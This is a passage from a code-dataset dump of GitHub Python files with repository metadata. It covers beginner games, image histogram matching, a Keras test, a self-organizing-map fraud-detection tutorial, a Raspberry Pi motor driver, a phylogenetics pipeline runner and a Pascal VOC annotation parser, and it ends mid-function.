blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
75011d583f8ed3d79e464fde4a0f8d561402530b
|
ea709c54bc670dfe29645d4953016b35bcd1ba51
|
/python101/small/work_or_sleep_in.py
|
98647724be5bc3bdd8a3286decf32538e4f362cf
|
[] |
no_license
|
aammokt/newProject
|
28a4d562738cf678442359d5e163ca192a2d652f
|
288c6a3ebce9debc5b681a847aabd039b2571832
|
refs/heads/master
| 2020-08-04T10:33:23.421375
| 2019-11-10T07:04:56
| 2019-11-10T07:04:56
| 212,107,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 108
|
py
|
day = int(input('Day (0-6)? '))
if day == 0 or day == 6:
print("Sleep in")
else:
print("Go to work")
|
[
"alim.anuar@gmail.com"
] |
alim.anuar@gmail.com
|
03407dc891590de2c8d38cae0e52aacc673380f7
|
120e6df90ad210b1608296302620e61a1e3d6e7d
|
/src/run_pyphlawd_sequential.py
|
78ed92d77def0beebd91d13c2f351b0e1672b7f6
|
[] |
no_license
|
uribe-convers/Fungi_ToL
|
83858993b6a77a2a9e6186f4f15ff918eeb53d43
|
e664ec46aeebca24ed1a01190673af02fe4bd144
|
refs/heads/master
| 2021-01-20T11:36:13.624816
| 2018-01-16T16:40:02
| 2018-01-16T16:40:02
| 99,732,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,572
|
py
|
#! /usr/bin/env python
""" use this to run pyphlawd, put this in a folder that you want to run the analyses"""
import os,sys
# change the database path accordingly
database= "/data_nvme/PHLAWD_DBS/pln.db"
# change your focal clade in Clade_list
Clade_list = ["Entomophthoromycotina", "Mortierellomycotina", "Ustilaginomycotina", "Taphrinomycotina", "Kickxellomycotina", "Zoopagomycotina", "Mucoromycotina", "Glomeromycotina", "Pezizomycotina", "Saccharomycotina", "Pucciniomycotina", "Agaricomycotina"]
WORKDIR = os.getcwd()+"/"
for i in Clade_list:
cmd_setup = "python ~/apps/PyPHLAWD/src/setup_clade.py "+i+" "+database+" . " # must use . for current directory
print cmd_setup
os.system(cmd_setup)
for f in os.listdir(WORKDIR):
if f.startswith(i) and not f.endswith(".tre"):
clusterID = f.split("_")[1]
outconf = open(WORKDIR+clusterID+".ctl", "a")
outconf.write("y\nn\ny\ny\n"+database+"\n"+clusterID+"\n")
outconf.close()
cmd_file = clusterID+"_cmd.txt"
cmd_goodclu = "python ~/apps/PyPHLAWD/src/find_good_clusters_for_concat.py "+f+" < "+WORKDIR+clusterID+".ctl"+" > "+cmd_file
print cmd_goodclu
os.system(cmd_goodclu)
with open(cmd_file,"rU") as handle:
for l in handle:
if l.startswith("python"):
cmd_filterseq = l.strip()
Concat_aln = WORKDIR+f+"/"+f+"_outaln"
concatin = open(WORKDIR+clusterID+"_concatIn.txt","w")
concatin.write(Concat_aln+"\n")
concatin.close()
cmd_filterseq += " < "+WORKDIR+clusterID+"_concatIn.txt"
print cmd_filterseq
os.system(cmd_filterseq)
|
[
"uribe.convers@gmail.com"
] |
uribe.convers@gmail.com
|
bf265d50b8e20e755fa294e2c7d246f1c1e2aa11
|
19b1bd54c1959ea7074e2ef691da8abfe2fd81eb
|
/Assignment_1/src/question7.2.i.py
|
46121e185ab79e009b615b24057f94d08e704d65
|
[] |
no_license
|
jeetv/Digital_Image_Processing
|
aba5f3962e8a705581bfcb01b2a5b8c08ddcf87e
|
cef0b9449106b8098eaf0c326159a10c1437c0c3
|
refs/heads/master
| 2022-11-18T20:51:54.824326
| 2020-07-15T06:40:04
| 2020-07-15T06:40:04
| 279,781,049
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,195
|
py
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
def cumulative_histogram(hist):
cum_hist = np.copy(hist)
for i in range(1, 256):
cum_hist[i] = cum_hist[i-1] + cum_hist[i]
return cum_hist
def histogram(img):
height = img.shape[0]
width = img.shape[1]
hist = np.zeros((256))
for i in range(height):
for j in range(width):
a = img[i,j]
hist[a] += 1
return hist
def Histogram_plot(title,img):
hist,bins = np.histogram(img.flatten(),256,[0,256])
cdf = hist.cumsum()
cdf_normalized = cdf * hist.max()/ cdf.max()
# plotting histogram
plt.plot(cdf_normalized, color = 'b')
plt.hist(img.flatten(),256,[0,256], color = 'r')
plt.title(title)
plt.xlim([0,256])
plt.legend(('cdf','histogram'), loc = 'upper left')
plt.show()
img = cv2.imread('D:/DIP/Assignment_1/a1_2019701006/input_data/eye.png', cv2.IMREAD_GRAYSCALE)
img_ref = cv2.imread('D:/DIP/Assignment_1/a1_2019701006/input_data/eye.png', cv2.IMREAD_GRAYSCALE)
def Histogram_Matching(img,img_ref):
Histogram_plot('Image',img)
Histogram_plot('Ref Image',img_ref)
row = img.shape[0]
col = img.shape[1]
pixels = row * col
pixels_ref = img_ref.shape[0] * img_ref.shape[1]
hist = histogram(img)
hist_ref = histogram(img_ref)
cum_hist = cumulative_histogram(hist)
cum_hist_ref = cumulative_histogram(hist_ref)
prob_cum_hist = cum_hist / pixels
prob_cum_hist_ref = cum_hist_ref / pixels_ref
K = 256
new_values = np.zeros((K))
for a in range(K):
j = K - 1
while True:
new_values[a] = j
j = j - 1
if j < 0 or prob_cum_hist[a] > prob_cum_hist_ref[j]:
break
for i in range(row):
for j in range(col):
a = img[i,j]
b = new_values[a]
img[i,j]=b
return img
Hist_match=Histogram_Matching(img,img_ref)
Histogram_plot('Histogram Matched',Hist_match)
cv2.imshow('Histogram matched',Hist_match)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
jeetv.noreply@github.com
|
442f06e185a19672e261b62b17153e72bbbe3877
|
ae0e6d02edd97a6d6e88b6483d92abca3bf55f63
|
/tests/test_sort_layer.py
|
967b3b07ade56662a98295ac9e51e4c9d17a1f24
|
[] |
no_license
|
thongonary/CMS_Deep_Learning
|
7a3ccb4ea341434ae083e6f5e0bf43e7df11d963
|
80e914f935d9cd6ca2f1237bc61fad5519b52906
|
refs/heads/master
| 2021-04-06T20:16:08.054349
| 2018-03-15T21:15:02
| 2018-03-15T21:15:02
| 125,426,799
| 2
| 0
| null | 2018-03-15T21:13:40
| 2018-03-15T21:13:34
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,435
|
py
|
import sys, os
if __package__ is None:
import sys, os
sys.path.append(os.path.realpath("../"))
import unittest
from keras.layers import Input
from keras.engine import Model
from CMS_Deep_Learning.layers.sort_layer import Sort,Perturbed_Sort,Finite_Differences
import numpy as np
def test_works():
a = Input(shape=(None, 4), name="input")
ls = Sort(initial_beta=np.array([1, 0, 0, 0]), name='sort')
s = ls(a)
p_ls = Perturbed_Sort(ls)
p_s = p_ls(a)
model = Model(input=[a], output=[s, p_s], name='test')
# print(Sort(nb_out=5).get_output_shape_for((1,2,3)))
inp = np.random.random((1000, 300, 4))
indicies = np.argsort(inp[:, :, 0])
# print(indicies)
target = np.array([np.take(inp[i], indicies[i], axis=-2) for i in range(inp.shape[0])])
# print("Input")
# print(inp)
# print("Target")
# print(target)
model.compile(optimizer=Finite_Differences(model, ls, p_ls), loss={'sort': 'mse',
'pert_sort': 'mse'})
# model.fit(inp, [target, target], nb_epoch=200,batch_size=1000)
print(model.evaluate(inp,[target,target],batch_size=1000))
# print(target)
# class TestLorentz(unittest.TestCase):
if __name__ == '__main__':
import objgraph
objgraph.show_most_common_types()
test_works()
objgraph.show_most_common_types()
# unittest.main()
|
[
"dannyweitekamp@gmail.com"
] |
dannyweitekamp@gmail.com
|
d0dbd2a5247684b1ca82b498129fb8f825def345
|
b9f791c320dd7c84ee388447fb7f46c583a8386f
|
/Week__6.py
|
1ec9332844a599e3562d0e998e329ae5014c44d6
|
[] |
no_license
|
smarigowda/SukruthiLearningPython
|
d39dec0beaed6d0aead32a5bac4fd086a9ef0de5
|
4190f7043cd1a3131963daa559d2d63154937f45
|
refs/heads/master
| 2020-06-13T23:55:39.599006
| 2017-02-12T18:16:21
| 2017-02-12T18:16:21
| 75,542,332
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# big number game
import random
highest = 1000
answer = random.randint(1, highest)
print("Please guess a number between 1 and {}: ".format(highest))
guess = 0
while guess != answer:
guess = int(input())
if guess == 0:
break
if guess < answer:
print("Please guess higher.")
elif guess > answer:
print("Please guess lower.")
else:
print("Well done, you guessed it")
|
[
"santosharakere@gmail.com"
] |
santosharakere@gmail.com
|
26805815aba615d6c989373312c4bc72265aa1f1
|
0329677920e29e68778c623b05bf4ca69e528c41
|
/Part 8 - Deep Learning/Section 42- SELF ORGANIZING MAPS_/Mega_Case_Study/Mega_Case_Study/som.py
|
3fd00008b8d5a3d504da1a882b30b3284fdcc0b8
|
[] |
no_license
|
celestialized/Machine-Learning
|
b2075b83139f66bc31c02c64cfe27dfbf19e4ab6
|
df30af31f04d03d9796974daf82373436fb6460e
|
refs/heads/master
| 2021-09-21T16:55:51.432572
| 2018-08-29T20:33:13
| 2018-08-29T20:33:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,040
|
py
|
# Self Organizing Map
#IT CONVERT MANY COLUMN INTO 2-d MAP
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
#http://archive.ics.uci.edu/ml/datasets/statlog+(australian+credit+approval)
#in this problem to detect the approval of credit card application
#here outlier are the faulty neurons which should not be approved
#here we will calculate mean interneuron distance(MID) i.e mean of euclian distance between study neuron and neighbourhood so we can detect outlier which will be far from the nieghbour neuron on basis of euclian distance
dataset = pd.read_csv('Credit_Card_Applications.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
#here will only use X in training set because doing unsuperwise deep learning// we are telling customer eligibility, not predicting classes. so no dependent variable considered.
# Feature Scaling(between 0 & 1)
#compulsary for deep learning so high computation
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler(feature_range = (0, 1))
X = sc.fit_transform(X)
# -------Training the SOM
#here we are using MiniSom 1.0
#https://test.pypi.org/project/MiniSom/1.0/
#here in your working directory , we need to keep Minisom 1.0.py file downloaded created by developer in working directory.
from minisom import MiniSom
som = MiniSom(x = 10, y = 10, input_len = 15, sigma = 1.0, learning_rate = 0.5)#object som trained on X// X & y are dimension of SOM(MORE THE DATA i.e no of CUSTOMER more will be dimension)/// here input_len is the no of feature in training dataset i.e X(14) and +1 for customer id
som.random_weights_init(X)#sigma is the radious of different neighbourhood i.e default value is 1.0// learning_rate will decide how much weight updated in each learning rate so default value is 0.5 so higher will be the learning_rate faster will be convergence, lower the learning_rate, longer the self organising map take time to build.// decay_function can be use to improve convergence
som.train_random(data = X, num_iteration = 100)#num_iteration is no of time it need to repeate
#random_weights_init IS THE method initialize the weight mention by developer i.e by Minisom1.0
#train_random method use to train
# ---------Visualizing the results
#here we will calculate mean interneuron distance(MID) i.e mean of euclian distance between study neuron and neighbourhood so we can detect outlier which will be far from the nieghbour neuron on basis of euclian distance
#larger the mid closer to white in colour
from pylab import bone, pcolor, colorbar, plot, show#BUILDING self organising map
bone()#initlizee the figure i.e window contain map
pcolor(som.distance_map().T)#use different colour for different MID/// distance_map WILL RETURN ALL mid IN MAPS.// ".T" will take transpose of MID matrics
colorbar()# that is legend for all colour
markers = ['o', 's']# 'o', 's' circle and squire as markers
colors = ['r', 'g']# red circle if customer did not get approval and green squire if customer got approval
for i, x in enumerate(X): # enumerate(X) all vector of customer in all iteration
w = som.winner(x)# winner get winning nodes of all customer
plot(w[0] + 0.5, #adding markers and color in each winner nodes
w[1] + 0.5, #0.5 to put at centre of marker
markers[y[i]], #if y[i] is 0 then marker[0] correspond to circle with red color
markeredgecolor = colors[y[i]],
markerfacecolor = 'None', #markerfacecolor tell that inside color of marker is non
markersize = 10,
markeredgewidth = 2)
show()
# Finding the frauds
mappings = som.win_map(X)#win_map use to get dictionary
frauds = np.concatenate((mappings[(8,1)], mappings[(3,8)]), axis = 0)# take outlier cordinate of "Visualizing the results" section// concatenate function use to concatenate these two customer in one list
frauds = sc.inverse_transform(frauds)# axis = 0 means concatenate aling vertical axis i.e customer put below to other
#inverse_transform use to reverse scaling
# ==========Part 2 - Going from Unsupervised to Supervised Deep Learning
# Creating the matrix of features
customers = dataset.iloc[:, 1:].values#all column from index 1 to last one
# Creating the dependent variable
#is_fraud is dependent variable
is_fraud = np.zeros(len(dataset))#vector initialize eith zero 690
for i in range(len(dataset)):# loop it if cusatomer id match with froud then replace 0 with 1 in is_fraud dependent variable
if dataset.iloc[i,0] in frauds:# ith customer of first column match with fraud id
is_fraud[i] = 1#replace
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
customers = sc.fit_transform(customers)
# ------Part 2 - Now let's make the ANN!
# Importing the Keras libraries and packages
from keras.models import Sequential
from keras.layers import Dense
# Initialising the ANN
classifier = Sequential()
# Adding the input layer and the first hidden layer
classifier.add(Dense(units = 2, kernel_initializer = 'uniform', activation = 'relu', input_dim = 15))
# Adding the output layer
classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))
# Compiling the ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fitting the ANN to the Training set
classifier.fit(customers, is_fraud, batch_size = 1, epochs = 2)# batch_size = 1, epochs = 2 use because have less data
# Predicting the probabilities of frauds
y_pred = classifier.predict(customers)
y_pred = np.concatenate((dataset.iloc[:, 0:1].values, y_pred), axis = 1)#concatenate dataset.iloc[:, 0:1].values is customer id, and y_pred row wise(axis = 1)
y_pred = y_pred[y_pred[:, 1].argsort()]# sorting probability
#second column(y_pred[:, 1) is going to sort
#argsort() sort the arrar of column index 1
#here we use 0:1 to make customer id 2-D array in concatenate because y_pred id 2-D matrix and customer id dataset.iloc[:, 0] have 1-D array so
|
[
"ranasinghiitkgp@gmail.com"
] |
ranasinghiitkgp@gmail.com
|
ecf8a9a8bf5893ca0a15c7017b893c7461e1bf29
|
1555996141776d77ca76a79ab768fb0f39689b84
|
/Create Your First Robot with ROS/my_robot_control/motor_driver.py
|
89bee657205764cf339002eb08717d3f924cac8d
|
[] |
no_license
|
im7RJ/ROSBOTS
|
d3ba146b4e63ec3fc24e935f372b28d80a57b6bd
|
5fd4d29d8d66f92ac4feea621a0afa4be67fe32b
|
refs/heads/main
| 2023-05-07T16:50:17.622818
| 2021-06-03T13:34:21
| 2021-06-03T13:34:21
| 373,515,598
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,694
|
py
|
#!/usr/bin/env python
import rospy
import RPi.GPIO as GPIO
import time
class MotorDriver(object):
def __init__(self, wheel_distance=0.098, wheel_diameter=0.066, i_BASE_PWM=50, i_MULTIPLIER_STANDARD=0.1, i_MULTIPLIER_PIVOT=1.0, simple_mode = True):
"""
M1 = Right Wheel
M2 = Left Wheel
:param wheel_distance: Distance Between wheels in meters
:param wheel_diameter: Diameter of the wheels in meters
"""
self.PIN = 18
self.PWMA1 = 6
self.PWMA2 = 13
self.PWMB1 = 20
self.PWMB2 = 21
self.D1 = 12
self.D2 = 26
self.PWM1 = 0
self.PWM2 = 0
self.BASE_PWM = i_BASE_PWM
self.MAX_PWM = 100
self.simple_mode = simple_mode
# Wheel and chasis dimensions
self._wheel_distance = wheel_distance
self._wheel_radius = wheel_diameter / 2.0
self.MULTIPLIER_STANDARD = i_MULTIPLIER_STANDARD
self.MULTIPLIER_PIVOT = i_MULTIPLIER_PIVOT
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(self.PIN, GPIO.IN, GPIO.PUD_UP)
GPIO.setup(self.PWMA1, GPIO.OUT)
GPIO.setup(self.PWMA2, GPIO.OUT)
GPIO.setup(self.PWMB1, GPIO.OUT)
GPIO.setup(self.PWMB2, GPIO.OUT)
GPIO.setup(self.D1, GPIO.OUT)
GPIO.setup(self.D2, GPIO.OUT)
self.p1 = GPIO.PWM(self.D1, 500)
self.p2 = GPIO.PWM(self.D2, 500)
self.p1.start(self.PWM1)
self.p2.start(self.PWM2)
def __del__(self):
GPIO.cleanup()
def set_motor(self, A1, A2, B1, B2):
GPIO.output(self.PWMA1, A1)
GPIO.output(self.PWMA2, A2)
GPIO.output(self.PWMB1, B1)
GPIO.output(self.PWMB2, B2)
def forward(self):
self.set_motor(0, 1, 0, 1)
def stop(self):
self.set_motor(0, 0, 0, 0)
def reverse(self):
self.set_motor(1, 0, 1, 0)
def left(self):
self.set_motor(0, 1, 0, 0)
def left_reverse(self):
self.set_motor(1, 0, 0, 0)
def pivot_left(self):
self.set_motor(1, 0, 0, 1)
def right(self):
self.set_motor(0, 0, 0, 1)
def right_reverse(self):
self.set_motor(0, 0, 1, 0)
def pivot_right(self):
self.set_motor(0, 1, 1, 0)
def set_M1M2_speed(self, rpm_speedM1, rpm_speedM2, multiplier):
self.set_M1_speed(rpm_speedM1, multiplier)
self.set_M2_speed(rpm_speedM2, multiplier)
def set_M1_speed(self, rpm_speed, multiplier):
self.PWM1 = min(int((rpm_speed * multiplier) * self.BASE_PWM), self.MAX_PWM)
self.p1.ChangeDutyCycle(self.PWM1)
print("M1="+str(self.PWM1))
def set_M2_speed(self, rpm_speed, multiplier):
self.PWM2 = min(int(rpm_speed * multiplier * self.BASE_PWM), self.MAX_PWM)
self.p2.ChangeDutyCycle(self.PWM2)
print("M2="+str(self.PWM2))
def calculate_body_turn_radius(self, linear_speed, angular_speed):
if angular_speed != 0.0:
body_turn_radius = linear_speed / angular_speed
else:
# Not turning, infinite turn radius
body_turn_radius = None
return body_turn_radius
def calculate_wheel_turn_radius(self, body_turn_radius, angular_speed, wheel):
if body_turn_radius is not None:
"""
if angular_speed > 0.0:
angular_speed_sign = 1
elif angular_speed < 0.0:
angular_speed_sign = -1
else:
angular_speed_sign = 0.0
"""
if wheel == "right":
wheel_sign = 1
elif wheel == "left":
wheel_sign = -1
else:
assert False, "Wheel Name not supported, left or right only."
wheel_turn_radius = body_turn_radius + ( wheel_sign * (self._wheel_distance / 2.0))
else:
wheel_turn_radius = None
return wheel_turn_radius
def calculate_wheel_rpm(self, linear_speed, angular_speed, wheel_turn_radius):
"""
Omega_wheel = Linear_Speed_Wheel / Wheel_Radius
Linear_Speed_Wheel = Omega_Turn_Body * Radius_Turn_Wheel
--> If there is NO Omega_Turn_Body, Linear_Speed_Wheel = Linear_Speed_Body
:param angular_speed:
:param wheel_turn_radius:
:return:
"""
if wheel_turn_radius is not None:
# The robot is turning
wheel_rpm = (angular_speed * wheel_turn_radius) / self._wheel_radius
else:
# Its not turning therefore the wheel speed is the same as the body
wheel_rpm = linear_speed / self._wheel_radius
return wheel_rpm
def set_wheel_movement(self, right_wheel_rpm, left_wheel_rpm):
#print("W1,W2=["+str(right_wheel_rpm)+","+str(left_wheel_rpm)+"]")
if right_wheel_rpm > 0.0 and left_wheel_rpm > 0.0:
#print("All forwards")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
if self.simple_mode:
# We make it turn only on one wheel
if right_wheel_rpm > left_wheel_rpm:
#print("GO FORWARDS RIGHT")
self.right()
if right_wheel_rpm < left_wheel_rpm:
#print("GO FORWARDS LEFT")
self.left()
if right_wheel_rpm == left_wheel_rpm:
#print("GO FORWARDS")
self.forward()
else:
#print("GO FORWARDS")
self.forward()
elif right_wheel_rpm > 0.0 and left_wheel_rpm == 0.0:
#print("Right Wheel forwards, left stop")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
self.left()
elif right_wheel_rpm > 0.0 and left_wheel_rpm < 0.0:
#print("Right Wheel forwards, left backwards --> Pivot left")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_PIVOT)
self.pivot_left()
elif right_wheel_rpm == 0.0 and left_wheel_rpm > 0.0:
#print("Right stop, left forwards")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
self.right()
elif right_wheel_rpm < 0.0 and left_wheel_rpm > 0.0:
#print("Right backwards, left forwards --> Pivot right")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_PIVOT)
self.pivot_right()
elif right_wheel_rpm < 0.0 and left_wheel_rpm < 0.0:
#print("All backwards")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
if self.simple_mode:
# We make it turn only on one wheel
if abs(right_wheel_rpm) > abs(left_wheel_rpm):
#print("GO BACKWARDS RIGHT")
self.right_reverse()
if abs(right_wheel_rpm) < abs(left_wheel_rpm):
#print("GO BACKWARDS LEFT")
self.left_reverse()
if right_wheel_rpm == left_wheel_rpm:
#print("GO BACKWARDS")
self.reverse()
else:
self.reverse()
elif right_wheel_rpm == 0.0 and left_wheel_rpm == 0.0:
#print("Right stop, left stop")
self.set_M1M2_speed(abs(right_wheel_rpm), abs(left_wheel_rpm), self.MULTIPLIER_STANDARD)
self.stop()
else:
assert False, "A case wasn't considered==>"+str(right_wheel_rpm)+","+str(left_wheel_rpm)
pass
def set_cmd_vel(self, linear_speed, angular_speed):
body_turn_radius = self.calculate_body_turn_radius(linear_speed, angular_speed)
wheel = "right"
right_wheel_turn_radius = self.calculate_wheel_turn_radius(body_turn_radius,
angular_speed,
wheel)
wheel = "left"
left_wheel_turn_radius = self.calculate_wheel_turn_radius(body_turn_radius,
angular_speed,
wheel)
right_wheel_rpm = self.calculate_wheel_rpm(linear_speed, angular_speed, right_wheel_turn_radius)
left_wheel_rpm = self.calculate_wheel_rpm(linear_speed, angular_speed, left_wheel_turn_radius)
self.set_wheel_movement(right_wheel_rpm, left_wheel_rpm)
|
[
"noreply@github.com"
] |
im7RJ.noreply@github.com
|
eaafd97a3b66ddc8243249cd58a921af8ae38985
|
7a6dcd5197e6dfedc5bdc38586adc0e3fd9d2676
|
/Unit3/ps3_hangman.py
|
fa6a5a610d1c80353f94fe2a646b9712cb34f58e
|
[] |
no_license
|
HrachAsatryan/PythonCourse
|
f8145757e20ef36671891656de8cb5fc0f0b371e
|
38fe4151e3805d482f3c1042a97742e4ed691dd3
|
refs/heads/main
| 2023-06-21T10:14:20.858366
| 2021-07-22T10:58:14
| 2021-07-22T10:58:14
| 379,166,722
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,552
|
py
|
# Hangman game
#
# -----------------------------------
# Helper code
# You don't need to understand this helper code,
# but you will have to know how to use the functions
# (so be sure to read the docstrings!)
import random
WORDLIST_FILENAME = "words.txt"
def loadWords():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print("Loading word list from file...")
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r')
# line: string
line = inFile.readline()
# wordlist: list of strings
wordlist = line.split()
print(" ", len(wordlist), "words loaded.")
return wordlist
def chooseWord(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
return random.choice(wordlist)
# end of helper code
# -----------------------------------
# Load the list of words into the variable wordlist
# so that it can be accessed from anywhere in the program
wordlist = loadWords()
def isWordGuessed(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: boolean, True if all the letters of secretWord are in lettersGuessed;
False otherwise
'''
for l in secretWord:
if l not in lettersGuessed:
return False
return True
def getGuessedWord(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters and underscores that represents
what letters in secretWord have been guessed so far.
'''
guess = ''
for l in secretWord:
if l in lettersGuessed:
guess += l
else:
guess += '_'
return guess
def getAvailableLetters(lettersGuessed):
'''
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters that represents what letters have not
yet been guessed.
'''
allletters = 'abcdefghijklmnopqrstuvwxyz'
availlets = ''
for l in allletters:
if l not in lettersGuessed:
availlets += l
return availlets
def hangman(secretWord):
'''
secretWord: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secretWord contains.
* Ask the user to supply one guess (i.e. letter) per round.
* The user should receive feedback immediately after each guess
about whether their guess appears in the computers word.
* After each round, you should also display to the user the
partially guessed word so far, as well as letters that the
user has not yet guessed.
Follows the other limitations detailed in the problem write-up.
'''
print("Welcome to the game Hangman!")
length = len(secretWord)
guessesLeft = 8
lettersGuessed = ''
print(f"I am thinking of a word that is {length} letters long.")
print("-------------")
done = False
while guessesLeft > 0 or done is True:
print(f"You have {guessesLeft} guesses left.")
print(f"Available letters: {getAvailableLetters(lettersGuessed)}")
guess = input("Please guess a letter: ")
guess = guess.lower()
if guess in lettersGuessed:
print(f"Oops! You've already guessed that letter: {getGuessedWord(secretWord, lettersGuessed)}")
elif guess in secretWord:
lettersGuessed += guess
print(f"Good guess: {getGuessedWord(secretWord, lettersGuessed)}")
else:
lettersGuessed += guess
guessesLeft -= 1
print(f"Oops! That letter is not in my word: {getGuessedWord(secretWord, lettersGuessed)}")
print("-------------")
if not "_" in getGuessedWord(secretWord, lettersGuessed):
print("Congratulations, you won!")
done = True
break
elif guessesLeft == 0:
print(f"Sorry, you ran out of guesses. The word was {secretWord}.")
break
# When you've completed your hangman function, uncomment these two lines
# and run this file to test! (hint: you might want to pick your own
# secretWord while you're testing)
secretWord = chooseWord(wordlist).lower()
hangman(secretWord)
|
[
"intelinair@IntelinAirs-MacBook-Pro.local"
] |
intelinair@IntelinAirs-MacBook-Pro.local
|
aea16e0264322faacb3cff68da0ac4f50a472a55
|
6f1034b17b49f373a41ecf3a5a8923fb4948992b
|
/pychron/hardware/kerr/tests/kerr_motor.py
|
fa203e2f504d4b02343785c91885bc3ab936dcce
|
[
"Apache-2.0"
] |
permissive
|
NMGRL/pychron
|
a6ec1854488e74eb5d3ff53eee8537ecf98a6e2f
|
8cfc8085393ace2aee6b98d36bfd6fba0bcb41c6
|
refs/heads/main
| 2023-08-30T07:00:34.121528
| 2023-06-12T17:43:25
| 2023-06-12T17:43:25
| 14,438,041
| 38
| 28
|
Apache-2.0
| 2023-08-09T22:47:17
| 2013-11-15T23:46:10
|
Python
|
UTF-8
|
Python
| false
| false
| 229
|
py
|
import unittest
class KerrMotorTestCase(unittest.TestCase):
def test_something(self):
self.assertEqual(True, False)
def test_float_to_hexstr(self):
pass
if __name__ == "__main__":
unittest.main()
|
[
"jirhiker@gmail.com"
] |
jirhiker@gmail.com
|
026ea2cb643b8aa5f372081eab11ecea7f645230
|
518e9704fa8af10be824deec4b55e40bb21060e0
|
/VOC/anchor/prior_anchors.py
|
ccd711fa7f0a1714debc534b6abac0d650d2f920
|
[] |
no_license
|
yl-jiang/Yolov2-Pytorch1.2
|
5d072d9b6e03cb759591fbc251cba7f946ed3d4e
|
4d41f695c099bc0567cbeff60bce8be94e2a8c38
|
refs/heads/master
| 2022-04-22T04:16:54.477783
| 2020-04-24T14:34:09
| 2020-04-24T14:34:09
| 258,536,965
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,125
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/8/22 下午3:53
# @Author : jyl
# @File : prior_anchors.py
from config import opt
import numpy as np
import matplotlib.pyplot as plt
import random
from utils import alias_sample
from tqdm import tqdm
import os
from bs4 import BeautifulSoup
import pickle
VOC_BBOX_LABEL_NAMES = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle',
'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person',
'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor')
def parse_voc2012_xml(xml_file):
bboxes = []
labels = []
obj_names = []
bs = BeautifulSoup(open(xml_file), features='lxml')
img_file_name = bs.find('filename').string
size_obj = bs.find('size')
width = int(float(size_obj.find('width').string))
height = int(float(size_obj.find('height').string))
for obj in bs.find_all('object'):
diffcult = int(obj.find('difficult').string)
if diffcult == 1:
continue
name = obj.find('name').string
obj_names.append(name)
if name in VOC_BBOX_LABEL_NAMES:
label = VOC_BBOX_LABEL_NAMES.index(name)
bndbox_obj = obj.find('bndbox', recursive=False)
y1 = int(float(bndbox_obj.find('ymax').string))
x1 = int(float(bndbox_obj.find('xmax').string))
y2 = int(float(bndbox_obj.find('ymin').string))
x2 = int(float(bndbox_obj.find('xmin').string))
bboxes.append([y1, x1, y2, x2])
labels.append(label)
return img_file_name, bboxes, labels, obj_names, width, height
def parse_voc(train_path):
AnnotationsPath = train_path
xml_fils = os.listdir(AnnotationsPath)
data_list = []
for f in tqdm(xml_fils):
tmp_dict = {}
xml_path = os.path.join(AnnotationsPath, f)
